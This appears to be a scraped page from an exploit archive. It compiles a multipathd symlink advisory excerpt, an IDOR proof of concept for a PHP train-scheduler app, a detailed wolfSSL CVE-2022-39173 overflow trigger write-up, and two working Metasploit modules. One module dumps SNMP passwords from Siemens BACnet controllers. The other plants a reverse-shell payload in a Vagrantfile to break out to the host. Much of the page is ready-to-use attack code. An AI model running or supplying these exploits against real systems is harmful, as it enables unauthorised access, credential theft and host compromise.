close(12) = 0<br />------------------------------------------------------------------------<br /><br />- at line 389, the directory "/dev/shm/multipath" is created, if it does<br /> not exist already;<br /><br />- at line 390, the directory "/dev/shm/multipath/failed_wwids" is<br /> created, if it does not exist already;<br /><br />- at lines 391-397, the empty file<br /> "/dev/shm/multipath/failed_wwids/VBOX_HARDDISK_VB60265ca5-df119cb6" is<br /> created, if it does not exist already (its name is the "World Wide ID"<br /> of the added device).<br /><br />multipathd is therefore vulnerable to two different symlink attacks:<br /><br />1/ if we (attackers) create an arbitrary symlink "/dev/shm/multipath",<br />then we can create a directory named "failed_wwids" (user root, group<br />root, mode 0700) anywhere in the filesystem;<br /><br />2/ if we create an arbitrary symlink "/dev/shm/multipath/failed_wwids",<br />then we can create a file named "VBOX_HARDDISK_VB60265ca5-df119cb6"<br />(user root, group root, mode 0400, size 0) anywhere in the filesystem.<br /><br />These two symlink attacks are very weak, because we do not control the<br />name, user, group, mode, or contents of the directory or file that we<br />create; only its location. Despite these limitations, we were able to<br />combine multipathd's vulnerabilities (authorization bypass and symlink<br />attack) with a third vulnerability (in another package), and obtained<br />full root privileges on Ubuntu Server 22.04; we will publish this third<br />vulnerability in an upcoming advisory.<br /><br />Side note: initially, we thought that the symlink attack 1/ would fail,<br />because /dev/shm is a sticky world-writable directory, and the kernel's<br />fs.protected_symlinks is 1 by default; to our great surprise, however,<br />it succeeded. Eventually, we understood that only the final component of<br />a path is protected, not its intermediate components; for example, if<br />/tmp/foo is a symlink, then an access to /tmp/foo itself is protected,<br />but an access to /tmp/foo/bar is not. Interestingly, this weakness was<br />already pointed out in 2017 by Solar Designer, and the original<br />Openwall, grsecurity, and Yama protections are not affected:<br /><br />https://www.openwall.com/lists/kernel-hardening/2017/06/06/74<br /><br /><br />========================================================================<br />Acknowledgments<br />========================================================================<br /><br />We thank Martin Wilck and Benjamin Marzinski for their hard work on this<br />release, and the SUSE Security Team for their help with this disclosure.<br />We also thank the members of linux-distros@openwall.<br /><br /><br />========================================================================<br />Timeline<br />========================================================================<br /><br />2022-08-24: Advisory sent to security@suse.<br /><br />2022-10-10: Advisory and patches sent to linux-distros@openwall.<br /><br />2022-10-24: Coordinated Release Date (15:00 UTC).<br /><br /></code></pre>
<pre><code># Exploit Title: Train Scheduler App v1.0 - Insecure Direct Object Reference (IDOR) to "delete user id " <br /># Exploit Author: Rohit Sharma<br /># Vendor Name: oretnom23 <br /># Vendor Homepage: https://www.sourcecodester.com/php/15720/train-scheduler-app-using-php-oop-and-mysql-database-free-download.html<br /># Software Link: https://www.sourcecodester.com/php/15720/train-scheduler-app-using-php-oop-and-mysql-database-free-download.html<br /># Version: v1.0<br /># Tested on: window, xampp ,apache<br /><br /><br />vulnerability description:- Train Scheduler App suffers from an Insecure Direct Object Reference (IDOR) vulnerability<br /><br /><br /><br />Vulnerable Parameters:<br />action , id <br /><br />how to reproduce this vulnerabilty:-<br />1:- host this web on local host <br />2:- go to this url http://127.0.0.1/train_scheduler_app/<br />3:- add random number to generate schedule list i creted alot list to testing this application <br />4:- go this url http://127.0.0.1/train_scheduler_app/?action=delete&id=5<br />5:- id parameter is vulnerbale for idor change this to increasing number to delet user schedule list 5>>6>>7>>8 etc <br /><br /><br /><br /></code></pre>
<pre><code># wolfssl before 5.5.1: CVE-2022-39173 Buffer overflow when refining<br />cipher suites<br />==================================================================================<br /><br /><br />## INFO<br />=======<br /><br />The CVE project has assigned the id CVE-2022-39173 to this issue.<br /><br />Severity: high 7.5<br />Affected version: before 5.5.1<br />End of embargo: The embargo for this vulnerability ended 29th of September, 2022<br /><br /><br />## SUMMARY<br />==========<br /><br />In wolfSSL before 5.5.1 malicious clients can cause a buffer-overflow<br />during a resumed TLS 1.3 handshake. If an attacker resumes a previous<br />TLS session by sending a maliciously crafted Client Hello, followed by<br />another maliciously crafted Client Hello. In total 2 Client Hellos<br />have to be sent. One which pretends to resume a previous session and a<br />second one as a response to a Hello Retry Request message.<br /><br />The malicious Client Hellos contain a list of supported cipher suites,<br />which contain at least `⌊sqrt(150)⌋ + 1 = 13` duplicates and less than<br />150 ciphers in total. The buffer-overflow occurs in the `RefineSuites`<br />function. An overflow of 44700 bytes has been confirmed. Therefore,<br />large portions of the stack can get overwritten, including return<br />addresses.<br /><br />We confirmed the vulnerability by sending packets over TCP to a<br />Wolfssl server, freshly built from the sources with the<br />`--enable-session-ticket` flags (or simply `--enable-all`). We can<br />provide sources for our software (tlspuffin) that produce those<br />packets (and that automatically found the attack trace). The command<br />given at the end of this document triggers the buffer overflow.<br /><br />It is very likely that there is a way to craft an exploit which can<br />cause a RCE. We have not yet created such an exploit as it would<br />likely depend on the memory layout of the binary which uses wolfSSL.<br /><br />Moreover, the size of the overflow can be fine-tuned in order to not<br />smash the stack and continue the execution with a too large length of<br />suites buffer and that will cause other routines that iterate over<br />thus buffer (e.g., `FindSuiteSSL`) to misbehave. Hypothetically, this<br />might be exploited to make the server use a cipher it should not<br />accept such as `nullcipher` that would open up new attack vectors such<br />as downgrade attacks.<br />While this has not been confirmed yet, the buffer overflow itself has<br />been confirmed.<br /><br /><br />## DETAILS<br />==========<br /><br />Line numbers below are valid for the wolfSSL Git tag<br />[v5.4.0-stable](https://github.com/wolfSSL/wolfssl/tree/v5.4.0-stable).<br /><br />The bug we found is in the `RefineSuites` function. In the following<br />we want to explain why the function is able to overflow the `suites`<br />array.<br />```c<br />/* Refine list of supported cipher suites to those common to server and client.<br /> *<br /> * ssl SSL/TLS object.<br /> * peerSuites The peer's advertised list of supported cipher suites.<br /> */<br />static void RefineSuites(WOLFSSL* ssl, Suites* peerSuites)<br />{<br /> byte suites[WOLFSSL_MAX_SUITE_SZ];<br /> word16 suiteSz = 0;<br /> word16 i, j;<br /><br /> XMEMSET(suites, 0, WOLFSSL_MAX_SUITE_SZ);<br /><br /> for (i = 0; i < ssl->suites->suiteSz; i += 2) {<br /> for (j = 0; j < peerSuites->suiteSz; j += 2) {<br /> if (ssl->suites->suites[i+0] == peerSuites->suites[j+0] &&<br /> ssl->suites->suites[i+1] == peerSuites->suites[j+1]) {<br /> suites[suiteSz++] = peerSuites->suites[j+0];<br /> suites[suiteSz++] = peerSuites->suites[j+1];<br /> }<br /> }<br /> }<br /><br /> ssl->suites->suiteSz = suiteSz;<br /> XMEMCPY(ssl->suites->suites, &suites, sizeof(suites));<br />#ifdef WOLFSSL_DEBUG_TLS<br /> [...]<br />#endif<br />}<br />```<br />tls13.c:4355<br /><br />The `RefineSuites` function expects a `WOLFSSL` struct which contains<br />a list of acceptable ciphers suites (`ssl->suites->suites`), as well<br />as an array of peer cipher suites (`peerSuites`). Both inputs are<br />bounded by `WOLFSSL_MAX_SUITE_SZ`, which is equal to 300 bytes or 150<br />cipher suites.<br /><br />Let us assume that `ssl->suites` consists of a single cipher suite<br />like `TLS_AES_256_GCM_SHA384` and the `peerSuites` list contains the<br />same cipher repeated thirteen times. The `RefineSuites` function will<br />iterate for each element in `ssl->suites` over `peerSuites` and append<br />the suite to `suites` if it is a match. The `suites` array has a<br />maximum length of `WOLFSSL_MAX_SUITE_SZ == 300 bytes == 150 suites`.<br /><br />With the just mentioned example input, the length of `suites` will now<br />equal thirteen. The `suites` array is now copied to the `WOLFSSL`<br />struct in the last line of the listing above. Therefore, `ssl->suites`<br />contains now thirteen times the `TLS_AES_256_GCM_SHA384` cipher suite.<br /><br />Let us now call the same `RefineSuites` function again on the modified<br />`WOLFSSL` struct and the same `peerSuites` list. The `RefineSuites`<br />function will iterate for each element in `ssl->suites` over<br />`peerSuites` and append the suite to `suites` if it is a match.<br />Because `ssl->suites` contains already 13 times the<br />`TLS_AES_256_GCM_SHA384` cipher suite, in total 13 x 13 = 169 cipher<br />suites are written to `suites`. 169 cipher suites require 338 bytes,<br />which is more than what's available on the stack. The `suites` buffer<br />overflows.<br /><br />The maximum size of `peerSuites` is 150 cipher suites. Therefore, an<br />overflow of 44700 bytes is possible and has been confirmed.<br /><br />The buffer `ssl->suites->suites` is supposed to be reset to only<br />contain the acceptable ciphers at each session start, and thus<br />initially contains no duplicate. However, by provoking a `HELLO CLIENT<br />RETRY REQUEST`, it is possible to make the server call `RefineSuites`<br />twice as explained next.<br /><br /><br />## TRIGGERING THE BUFFER OVERFLOW<br />=================================<br /><br />In order to cause the above buffer-overflow, it is required to call<br />`RefineSuites` twice. Malicious clients need to perform the handshake<br />in a certain way to reach this situation.<br />The buffer overflow at the attacked server can be obtained at least in<br />the following situation:<br /><br />1. Resume the previous session by sending a second Client Hello<br />(`CH2`) with the following criteria:<br /> - Exclude the `support_group_extension`, to cause a Hello Retry Request<br /> - Include a binder which cryptographically binds this session to<br />the previous one.<br /> - Include a list of cipher suites that contains a repetition of `n`<br />times the same cipher `c` with `13 <= n < 150`, deemed acceptable by<br />the server.<br /><br /> The server will parse this message, enters the state<br />`SERVER_HELLO_RETRY_REQUEST_COMPLETE` and stores at least `n` times<br />the cipher `c` in `ssl->suites->suites` by calling `RefineSuites`.<br /><br />2. Sending a third Client Hello (`CH3`) with the same criteria as in step 2.<br /> The server will parse this message and because<br />`ssl->suites->suites` already contains `n` times the cipher `c`,<br />`RefineSuites` will write in `suites` at least until `suites[nˆ2]`<br />which overflows since `nˆ2 > 300`.<br /><br /><br />## DETAILS ABOUT STEP 1.<br />========================<br /><br />During step 2., we want to cause the server to perform a Hello Retry Request.<br /><br />This is possible by not sending a supported group in the `CH2`. By not<br />sending a support group extension, the function<br />`TLSX_SupportedGroups_Find` will return false.<br /><br />```c<br />static int TLSX_SupportedGroups_Find(WOLFSSL* ssl, word16 name)<br />{<br /> ...<br /> /* Check consistency now - extensions in any order. */<br /> if (!TLSX_SupportedGroups_Find(ssl, clientKSE->group))<br /> continue;<br /> ...<br />```<br />tls.c:8374<br /><br />This will cause clientKSE to be `NULL` and `doHelloRetry` will be set to 1.<br /><br />```c<br />int TLSX_KeyShare_Establish(WOLFSSL *ssl, int* doHelloRetry)<br />{<br /> ...<br /> /* No supported group found - send HelloRetryRequest. */<br /> if (clientKSE == NULL) {<br /> /* Set KEY_SHARE_ERROR to indicate HelloRetryRequest required. */<br /> *doHelloRetry = 1;<br /> return TLSX_KeyShare_SetSupported(ssl);<br /> }<br /> ...<br />```<br />tls.c:9273<br /><br />Finally, the server enters the state<br />`SERVER_HELLO_RETRY_REQUEST_COMPLETE` in the function<br />`VerifyServerSuite` while verifying the server suite when processing<br />`CH2`.<br /><br />```c<br /> /* Make sure server cert/key are valid for this suite, true on success<br /> * Returns 1 for valid server suite or 0 if not found<br /> * For asynchronous this can return WC_PENDING_E<br /> */<br /> static int VerifyServerSuite(WOLFSSL* ssl, word16 idx)<br /> {<br /> ...<br /> if (IsAtLeastTLSv1_3(ssl->version) &&<br /> ssl->options.side == WOLFSSL_SERVER_END) {<br /> int doHelloRetry = 0;<br /> /* Try to establish a key share. */<br /> int ret = TLSX_KeyShare_Establish(ssl, &doHelloRetry);<br /> if (doHelloRetry) {<br /> ssl->options.serverState = SERVER_HELLO_RETRY_REQUEST_COMPLETE;<br /> }<br /><br /> ...<br /> }<br /> ...<br />```<br />tls.c:30688<br /><br /><br />## DETAILS ABOUT STEP 2.<br />====================<br /><br />The server is now in a state in which it expects another Client Hello<br />(`CH3`) from the client.<br /><br />The server is now in the state `SERVER_HELLO_RETRY_REQUEST_COMPLETE`<br />and will process the third ClientHello (`CH3`) with the call of<br />`ProcessReply` before reaching the `TLS13_ACCEPT_SECOND_REPLY_DONE`<br />state.<br /><br />```c<br />int wolfSSL_accept_TLSv13(WOLFSSL* ssl)<br />{<br /> ...<br /> case TLS13_ACCEPT_FIRST_REPLY_DONE :<br /> if (ssl->options.serverState ==<br /> SERVER_HELLO_RETRY_REQUEST_COMPLETE) {<br /> ssl->options.clientState = CLIENT_HELLO_RETRY;<br /> while (ssl->options.clientState < CLIENT_HELLO_COMPLETE) {<br /> if ((ssl->error = ProcessReply(ssl)) < 0) {<br /> WOLFSSL_ERROR(ssl->error);<br /> return WOLFSSL_FATAL_ERROR;<br /> }<br /> }<br /> }<br /><br /> ssl->options.acceptState = TLS13_ACCEPT_SECOND_REPLY_DONE;<br /> WOLFSSL_MSG("accept state ACCEPT_SECOND_REPLY_DONE");<br /> FALL_THROUGH;<br /> ...<br />```<br />tls13.c:10909<br /><br />## VULNERABILITY VARIANTS<br />=========================<br /><br />### Adjusting the overflow<br />Note that the length of the list of ciphers in `CH2` does not<br />necessarily have to be the same as the one of `CH1` and can be<br />adjusted to fine-tune the size of the overflow.<br /><br />### Make the server parse `CH2`<br />Note also that, on the contrary to `CH1`, `CH2` does not necessarily<br />have to put the server in the `SERVER_HELLO_RETRY_REQUEST_COMPLETE`<br />state (which should be forbidden by the TLS 1.3 RFC) or make it return<br />an error, and can thus contain a supported group, which could be<br />included to possibly make the server continue the processing of `CH2`<br />without returning an error.<br />We have confirmed that we can make the server parses `CH2` until the<br />end and starts computing a Server Hello with `ssl->suites->suiteSz`<br />that exceeds 300.<br /><br />### Resuming an existent session<br />It is also possible to trigger the vulnerability by trying to resume<br />an existent and genuine session established through a full initial<br />handshake (step 0.):<br />0. Sending an initial genuine Client Hello (`CH1`) to the server and<br />then completing a full handshake, thus establishing a PSK.<br /><br /><br />## EXPLOITATION<br />===============<br /><br />We suspect that it is possible to craft an exploit which could lead to<br />RCE if any of the above bytes coincides with the memory address of<br />executable code. Depending on the memory layout of the binary it could<br />be possible to gain RCE.<br />More bytes could be used to overflow `suites` if more ciphers were<br />configured to be accepted with the server, e.g., with options like<br />`--enable-blake2`.<br /><br />We confirmed that this could also be exploited to smash the stack and<br />cause the server to crash with a segmentation fault by using a large<br />list of ciphers.<br /><br />Finally, by fine-tuning the length of the overflow and by including<br />the supported group in `CH3`, it could be possible to make the server<br />process `CH3` with a `ssl->suites->suites->suiteSz` value that exceeds<br />300. This way, routines like `FindSuiteSSL` that will iterate over<br />`ssl->suites->suites` (allocated on 300 bytes) until<br />`ssl->suites->suiteSz` (>300) will also iterate over bytes that<br />contain other fields such as `ssl->suites->hashSigAlgo`. It is likely<br />that this could be exploited to make such routines return arbitrary<br />values. For example, it might be exploited to make the server use a<br />cipher it should not accept such as `nullcipher`; thus breaking<br />confidentiality.<br /><br />## FURTHER CONCERNS<br />==================<br /><br />We observed that the server is accepting the `CH2` Client Hello<br />message and issues a Hello Retry Request, even though `CH2` does not<br />contain supported groups. Clients are not allowed to add the supported<br />groups extension in the retry Client Hello (`CH3`) according to the<br />RFC 8446 in section<br />[4.1.2](https://www.rfc-editor.org/rfc/rfc8446#section-4.1.2). The<br />addition of supported groups is not allowed when retrying the Client<br />Hello.<br />We suggest aborting the handshake when receiving `CH2` instead of<br />offering the client a retry.<br /><br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /><br /># -*- coding: utf-8 -*-<br /># 2022-05-23<br /><br /># Standard Modules<br />from metasploit import module<br /><br /># Extra Dependencies<br />dependencies_missing = False<br />try:<br /> import logging<br /> import requests<br /> import requests<br /> import xmltodict<br /> import xml.etree.ElementTree as ET<br /> import socket<br /> import struct<br /> import requests<br />except ImportError:<br /> dependencies_missing = True<br /><br /><br /># Metasploit Metadata<br />metadata = {<br /> 'name': 'Siemens BACnet Field Panel Path Traversal',<br /> 'description': '''<br /> This module exploits a hidden directory on Siemens APOGEE PXC BACnet Automation Controllers (all versions prior to V3.5), and TALON TC BACnet Automation Controllers (all versions prior to V3.5). With a 7.5 CVSS, this exploit allows for an attacker to perform an authentication bypass using an alternate path or channel to enumerate hidden directories in the web server.<br /> ''',<br /> 'authors': [<br /> 'RoseSecurity', <br /> ],<br /> 'date': '2022-05-23',<br /> 'license': 'MSF_LICENSE',<br /> 'references': [<br /> {'type': 'url', 'ref': 'https://sid.siemens.com/v/u/A6V10304985'},<br /> {'type': 'cve', 'ref': 'https://nvd.nist.gov/vuln/detail/CVE-2017-9946'},<br /> ],<br /> 'type': 'single_scanner',<br /> 'options': {<br /> 'rhost': {'type': 'string', 'description': 'Target address', 'required': True, 'default': None},<br /> }<br />}<br /><br />def run(args):<br /> module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))<br /> if dependencies_missing:<br /> logging.error('Module dependency (requests) is missing, cannot continue')<br /> return<br /><br /> try:<br /> # Download Hidden XML File<br /> r = requests.get('http://{}/{}'.format(args['rhost'], '/FieldPanel.xml'), verify=False)<br /> <br /> # Convert to Readable Format<br /> xml_doc = r.content<br /> root = ET.fromstring(xml_doc)<br /> <br /> # Parse XML for Sensitive Data<br /> module.log("Remote Site ID: " + root[18].text)<br /> module.log("Building Level Network Name: " + root[26].text)<br /> module.log("Site Name: " + root[27].text)<br /> module.log("Hostname: " + root[28].text)<br /> ip_addr = int(root[30].text, 16)<br /> module.log("IP Address: " + socket.inet_ntoa(struct.pack(">L", ip_addr)))<br /> gw_addr = int(root[32].text, 16)<br /> gw_addr = str(socket.inet_ntoa(struct.pack(">L", gw_addr)))<br /> module.log("Gateway IP Address: " + gw_addr[::-1])<br /> module.log("Maximum Transmission Size: " + root[57].text)<br /> module.log("BACnet Device Name: " + root[60].text)<br /> module.log("BACnet UDP Port: " + root[62].text)<br /> module.log("Device Location: " + root[63].text)<br /> module.log("Device Description: " + root[64].text)<br /> module.log("Device Barcode: " + root[88].text)<br /> module.log("Device Revision String: " + root[104].text)<br /> module.log("Device Firmware: " + root[105].text)<br /> module.log("Panel Key Name: " + root[109].text)<br /> module.log("SNMP Username: " + root[148].text)<br /> module.log("SNMP Private Password: " + root[149].text)<br /> module.log("SNMP Authorization Password: " + root[150].text)<br /> <br /> # Determine Running Services<br /> if int(root[48].text) == 1:<br /> module.log("Telnet Enabled")<br /> else:<br /> module.log("Telnet Disabled")<br /><br /> if int(root[84].text) == 1:<br /> module.log("Wireless Enabled")<br /> else:<br /> module.log("Wireless Disabled")<br /><br /> if int(root[103].text) == 3:<br /> module.log("Webserver Enabled")<br /> else:<br /> module.log("Webserver Disabled")<br /><br /> except requests.exceptions.RequestException as e:<br /> logging.error('{}'.format(e))<br /> return<br /><br /><br /><br /><br />if __name__ == '__main__':<br /> module.run(metadata, run)<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Post::File<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Vagrant Synced Folder Vagrantfile Breakout',<br /> 'Description' => %q{<br /> This module exploits a default Vagrant synced folder (shared folder)<br /> to append a Ruby payload to the Vagrant project Vagrantfile config file.<br /><br /> By default, unless a Vagrant project explicitly disables shared folders,<br /> Vagrant mounts the project directory on the host as a writable 'vagrant'<br /> directory on the guest virtual machine. This directory includes the<br /> project Vagrantfile configuration file.<br /><br /> Ruby code within the Vagrantfile is loaded and executed when a user<br /> runs any vagrant command from the project directory on the host,<br /> leading to execution of Ruby code on the host.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'HashiCorp', # Vagrant defaults<br /> 'bcoles' # Metasploit<br /> ],<br /> 'DisclosureDate' => '2011-01-19', # Vagrant 0.7.0 release date - first mention of shared folders in CHANGELOG<br /> 'Platform' => %w[ruby],<br /> 'Arch' => ARCH_ALL,<br /> 'SessionTypes' => [ 'shell', 'powershell', 'meterpreter' ],<br /> 'Stance' => Msf::Exploit::Stance::Passive,<br /> 'DefaultOptions' => {<br /> 'DisablePayloadHandler' => true<br /> },<br /> 'Targets' => [<br /> [<br /> 'Ruby Code',<br /> {<br /> 'Platform' => 'ruby',<br /> 'Arch' => ARCH_RUBY,<br /> 'Type' => :ruby,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'ruby/shell_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'Payload' => { 'BadChars' => '`' },<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'References' => [<br /> ['URL', 'https://www.vagrantup.com/docs/synced-folders'],<br /> ['URL', 'https://www.virtualbox.org/manual/ch04.html#sharedfolders']<br /> ],<br /> 'Notes' => {<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('VAGRANTFILE_PATH', [false, 'Path to Vagrantfile (leave blank to auto detect)', ''])<br /> ])<br /> end<br /><br /> # Search potential default shared directories for Vagrantfile configuration file<br /> def find_vagrantfile_path<br /> unless datastore['VAGRANTFILE_PATH'].blank?<br /> return exists?(datastore['VAGRANTFILE_PATH']) ? datastore['VAGRANTFILE_PATH'] : nil<br /> end<br /><br /> # Default Vagrant synced folders (aka shared folders)<br /> default_shared_directories = [<br /> 'C:\\vagrant\\',<br /> '/vagrant/'<br /> ]<br /><br /> default_shared_directories.each do |dir_path|<br /> begin<br /> vagrant_shared_dir_contents = dir(dir_path)<br /> rescue Rex::Post::Meterpreter::RequestError<br /> next<br /> end<br /><br /> next if vagrant_shared_dir_contents.empty?<br /><br /> # Vagrant project configuration file name is case-insensitive (typically "Vagrantfile")<br /> vagrant_shared_dir_contents.each do |fname|<br /> return "#{dir_path}#{fname}" if fname.downcase == 'vagrantfile'<br /> end<br /> end<br /><br /> nil<br /> end<br /><br /> def vagrantfile<br /> @vagrantfile ||= find_vagrantfile_path<br /> end<br /><br /> def check<br /> return CheckCode::Safe('Vagrantfile not found.') unless vagrantfile<br /><br /> # `writable?' method does not support Windows systems<br /> begin<br /> return CheckCode::Detected("#{vagrantfile} is not writable.") unless writable?(vagrantfile)<br /> rescue RuntimeError<br /> return CheckCode::Detected("Could not verify if #{vagrantfile} is writable.")<br /> end<br /><br /> CheckCode::Appears("#{vagrantfile} is writable!")<br /> end<br /><br /> def exploit<br /> fail_with(Failure::NotVulnerable, 'Could not find Vagrantfile') unless vagrantfile<br /><br /> case target['Type']<br /> when :ruby<br /> data = payload.encoded<br /> when :unix_cmd<br /> data = "`#{payload.encoded}`"<br /> else<br /> fail_with(Failure::NoTarget, 'No target selected')<br /> end<br /><br /> print_status("Appending payload (#{data.length} bytes) to #{vagrantfile} ...")<br /><br /> unless append_file(vagrantfile, "\n#{data}\n")<br /> fail_with(Failure::Unknown, "Could not write to #{vagrantfile}")<br /> end<br /><br /> print_status("Payload appended to #{vagrantfile}")<br /> print_status('The payload will be executed when a user runs any vagrant command from within the project directory on the host system.')<br /> print_warning("This module requires manual removal of the payload from the project Vagrantfile: #{vagrantfile}")<br /> end<br />end<br /></code></pre>